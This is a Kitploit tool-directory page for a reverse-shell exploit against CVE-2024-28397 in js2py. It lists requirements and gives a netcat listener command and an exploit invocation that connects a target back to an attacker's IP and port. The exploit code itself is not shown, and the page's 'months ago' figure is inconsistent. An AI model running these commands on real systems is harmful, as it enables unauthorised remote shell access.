Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-28397-Reverse-Shell — Reverse shell for CVE-2024-28397. | Kitploit
Tools/GitHubGitHub/somisec/cve-2024-28397-reverse-shell
Payload GenerationExploitationShellcodeWeb Application ExploitationRemote Access Tool
GitHubsomisec/cve-2024-28397-reverse-shell

CVE-2024-28397-Reverse-Shell

Reverse shell for CVE-2024-28397.

View Repository
110 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-28397-Reverse-Shell

Reverse shell for CVE-2024-28397.

Exploit works for js2py <= v0.74

Requirements

  • requests library (pip install requests)
  • Python3
  • Netcat (Or something that you can use as a listener for the reverse shell)

Usage

For listener
root@kitploit:~
nc -lnvp 4444
For exploit
root@kitploit:~
python3 exploit.py 10.129.66.160 8000 /run_code --local_ip 10.10.15.11 --local_port 4444 
Download Tool